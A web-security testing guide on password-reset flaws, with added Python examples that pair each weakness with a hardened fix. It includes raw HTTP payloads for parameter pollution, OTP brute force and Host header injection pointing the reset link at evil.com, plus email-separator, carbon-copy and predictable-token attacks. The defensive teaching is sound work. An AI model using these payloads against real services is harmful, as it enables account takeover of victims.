Forgot Password Functionality

Introduction

Some common bugs in forgot-password / reset-password functionality, and how to test for them. Most of them come down to one question: can an attacker get the reset link or code for someone else's account, or guess it?

How to exploit

  1. Parameter pollution

Send the victim's address and an attacker-controlled address in the same parameter. A handler that checks account existence against one value but mails the other delivers the reset link to the attacker.

POST /reset HTTP/1.1
Host: target.com
...

email=victim@mail.com&email=hacker@mail.com

  1. Bruteforce the OTP code

If the reset code is a short numeric OTP and the endpoint has no rate limiting, lockout or code expiry, every value can be tried. $123456$ marks the payload position for the brute-force tool (Burp Intruder style); a 6-digit code is at most 1,000,000 requests.

POST /reset HTTP/1.1
Host: target.com
...

email=victim@mail.com&code=$123456$
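An added example (not from the original page) that simulates the OTP brute force offline. It models the vulnerable endpoint as a verifier with no attempt limit and the fix as a verifier that burns the code after a few failures; the 6-digit format is assumed from the $123456$ placeholder above, and the attacker loop submits codes in the same order Intruder would.

```python
import hmac

# Assumed from the page's $123456$ placeholder: a zero-padded 6-digit reset code.
OTP_DIGITS = 6


class NoRateLimitVerifier:
    """Vulnerable: accepts unlimited guesses, so the code is always found within 10**6 tries."""

    def __init__(self, code: str):
        self._code = code

    def verify(self, email: str, code: str) -> bool:
        # Constant-time compare; the weakness here is the missing attempt limit, not the compare.
        return hmac.compare_digest(self._code, code)


class LockoutVerifier:
    """Hardened: per-address failure counter; the code is invalidated after max_attempts failures
    and the user must request a fresh one."""

    def __init__(self, code: str, max_attempts: int = 5):
        self._code = code
        self._max_attempts = max_attempts
        self._failures: dict[str, int] = {}
        self._burned = False

    def verify(self, email: str, code: str) -> bool:
        if self._burned:
            return False
        if hmac.compare_digest(self._code, code):
            return True
        self._failures[email] = self._failures.get(email, 0) + 1
        if self._failures[email] >= self._max_attempts:
            self._burned = True
        return False


def brute_force(verifier, email: str, max_tries: int = 10 ** OTP_DIGITS):
    """Attacker loop: submit every zero-padded code in order, like Intruder over $123456$.
    Returns (code_or_None, attempts_made)."""
    attempts = 0
    for n in range(max_tries):
        candidate = f"{n:0{OTP_DIGITS}d}"
        attempts += 1
        if verifier.verify(email, candidate):
            return candidate, attempts
    return None, attempts


if __name__ == "__main__":
    # Constructed scenario: the server issued code 004271 for the victim.
    print(brute_force(NoRateLimitVerifier("004271"), "victim@mail.com"))   # found after 4272 tries
    print(brute_force(LockoutVerifier("004271"), "victim@mail.com", 1000))  # never found
```

When testing a real target, the signal to look for is the absence of any change in the response after a few hundred wrong codes (no 429, no lockout message, no captcha) and whether an expired or re-requested code is still accepted.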
  1. Host header Injection

If the application builds the reset link from the Host request header (or X-Forwarded-Host), change Host: target.com to Host: evil.com in the reset request for the victim's address.

The victim then receives a reset link pointing to evil.com, and clicking it delivers the reset token to the attacker's server.
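An added example (not from the original page) showing the link-builder bug beside its fix. The hostnames, the /reset path and the token query parameter are assumptions for illustration; the point is that the vulnerable builder trusts a client-controlled header while the hardened one only ever uses server-side configuration.

```python
from urllib.parse import urlunsplit

# Assumed: the hostnames this application legitimately serves.
CANONICAL_HOST = "target.com"
ALLOWED_HOSTS = {"target.com", "www.target.com"}


def reset_link_vulnerable(headers: dict, token: str) -> str:
    """Builds the link from whatever host the client sent.
    Many frameworks honour X-Forwarded-Host before Host, so both are attacker-controlled."""
    host = headers.get("X-Forwarded-Host") or headers["Host"]
    return urlunsplit(("https", host, "/reset", f"token={token}", ""))


def host_is_allowed(headers: dict) -> bool:
    """Allow-list check a front controller should run on every request (Django's ALLOWED_HOSTS does this)."""
    host = headers.get("Host", "").split(":")[0].lower()
    return host in ALLOWED_HOSTS


def reset_link_hardened(headers: dict, token: str) -> str:
    """Rejects requests whose Host is not allow-listed and never reads the header when building the link."""
    if not host_is_allowed(headers):
        raise ValueError("unrecognised Host header")
    return urlunsplit(("https", CANONICAL_HOST, "/reset", f"token={token}", ""))


if __name__ == "__main__":
    poisoned = {"Host": "evil.com"}
    print(reset_link_vulnerable(poisoned, "abc123"))  # https://evil.com/reset?token=abc123
    try:
        reset_link_hardened(poisoned, "abc123")
    except ValueError as e:
        print("hardened:", e)
```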

  1. Using a separator in the value of the parameter, so that an attacker-controlled address is appended to the victim's and the mailer sends to both

  1. No domain in the value of the parameter (local part only); observe how the backend completes or validates it

  1. No TLD in the value of the parameter; observe the same

  1. Using carbon copy, so the reset mail is also delivered to an attacker address

  1. If the request body is JSON, add a comma and a second value (or a second copy of the email key) and see which one the backend uses
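An added example (not from the original page) that covers parameter pollution, the separator trick and the JSON duplicate-key trick from this list in one place, and whose hardened validator also rejects the no-domain, no-TLD and carbon-copy variants. The request bodies are constructed; the separator and JSON forms are this example's interpretation of those list items. The vulnerable extractor mimics a handler that checks account existence on one view of the value and builds the recipient list from another, which is the root cause behind all of these tricks.

```python
import json
import re
from urllib.parse import parse_qs

# Constructed request bodies, one per trick.
BODIES = {
    "parameter pollution": ("form", "email=victim@mail.com&email=hacker@mail.com"),
    "separator in value": ("form", "email=victim@mail.com,hacker@mail.com"),
    "json duplicate key": ("json", '{"email": "victim@mail.com", "email": "hacker@mail.com"}'),
    "carbon copy":        ("form", "email=victim@mail.com%0acc:hacker@mail.com"),
    "no domain":          ("form", "email=victim"),
    "no tld":             ("form", "email=victim@mail"),
}

# Strict single-address shape; no commas, whitespace or newlines can get through.
_EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def extract_vulnerable(kind: str, body: str):
    """Returns (address_used_for_lookup, recipients_mailed). The two views disagree."""
    if kind == "form":
        values = parse_qs(body)["email"]            # pollution -> two values; separator -> one value
        lookup = values[0].split(",")[0]            # existence check sees the victim
        recipients = [v for value in values for v in value.split(",")]  # mailer sends to all
        return lookup, recipients
    # JSON: a schema/WAF check on the raw body sees the first key, json.loads keeps the LAST one.
    lookup = re.search(r'"email"\s*:\s*"([^"]*)"', body).group(1)
    return lookup, [json.loads(body)["email"]]


def _reject_duplicates(pairs):
    """object_pairs_hook that refuses duplicate JSON keys instead of silently keeping the last."""
    obj = {}
    for key, value in pairs:
        if key in obj:
            raise ValueError(f"duplicate key {key!r}")
        obj[key] = value
    return obj


def extract_hardened(kind: str, body: str) -> str:
    """Parses once, requires exactly one value, and validates it before any lookup or mail."""
    if kind == "form":
        values = parse_qs(body, strict_parsing=True).get("email", [])
        if len(values) != 1:
            raise ValueError("exactly one email parameter required")
        value = values[0]
    else:
        value = json.loads(body, object_pairs_hook=_reject_duplicates).get("email")
    if not isinstance(value, str) or not _EMAIL_RE.fullmatch(value):
        raise ValueError("invalid email")
    return value


def hardened_rejects(kind: str, body: str) -> bool:
    """Convenience for checking that a malicious body is refused."""
    try:
        extract_hardened(kind, body)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    for name, (kind, body) in BODIES.items():
        try:
            print(f"{name:20} vulnerable: {extract_vulnerable(kind, body)}")
        except (KeyError, AttributeError, ValueError):
            print(f"{name:20} vulnerable: parse error")
        print(f"{name:20} hardened rejects: {hardened_rejects(kind, body)}")
```

The fix is not the regex alone: the address that was validated must be the same object that is looked up and handed to the mailer, with duplicates rejected at parse time rather than resolved by whichever library happens to win.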

  1. Find out how the tokens are generated. Request several reset tokens for accounts you control, at known times, and compare them; a token is predictable if it is:

  • Generated based on a timestamp

  • Generated based on the ID of the user

  • Generated based on the email of the user

  • Generated based on the name of the user
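An added example (not from the original page) of why a token derived from the email plus a timestamp is recoverable. The weak generator, the attacker's timing window and all addresses are constructed for the example; the same search works when the material is a user ID or name instead of the email, since the attacker can usually learn those too. The attacker first requests a reset for their own account to pin down the exact server second, then enumerates the victim's token over the next few seconds.

```python
import hashlib
import secrets


def weak_token(email: str, unix_seconds: int) -> str:
    """Constructed weak scheme: MD5 of email and request time. Everything in it is guessable."""
    return hashlib.md5(f"{email}:{unix_seconds}".encode()).hexdigest()


def recover_generator_time(own_email: str, own_token: str, approx_time: int, window: int = 60):
    """Attacker step 1: match the token issued for the attacker's own account to find
    the exact second the server used (and confirm the scheme). Returns the second or None."""
    for t in range(approx_time - window, approx_time + window + 1):
        if weak_token(own_email, t) == own_token:
            return t
    return None


def candidate_victim_tokens(victim_email: str, t: int, spread: int = 3) -> list[str]:
    """Attacker step 2: the victim's reset was requested right after the attacker's own,
    so the real token is one of a handful of candidates around second t."""
    return [weak_token(victim_email, s) for s in range(t, t + spread + 1)]


def strong_token() -> str:
    """Fix: 256 bits from the OS CSPRNG, unrelated to any user attribute or clock."""
    return secrets.token_urlsafe(32)


def token_fingerprint(token: str) -> str:
    """Store only a hash server-side, so a database leak does not hand out live reset links."""
    return hashlib.sha256(token.encode()).hexdigest()


if __name__ == "__main__":
    # Constructed scenario: attacker's reset issued at t0, victim's one second later.
    t0 = 1_700_000_000
    own = weak_token("hacker@mail.com", t0)
    victim = weak_token("victim@mail.com", t0 + 1)
    t = recover_generator_time("hacker@mail.com", own, approx_time=t0 + 17)
    print("server second:", t, "victim token guessed:", victim in candidate_victim_tokens("victim@mail.com", t))
    print("strong token:", strong_token())
```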

  1. Try Cross-Site Scripting (XSS) in the form

Sometimes the submitted email is reflected in the forgot-password page (for example in a "we sent a link to ..." message). Try an XSS payload in the email field and check whether it comes back unescaped.
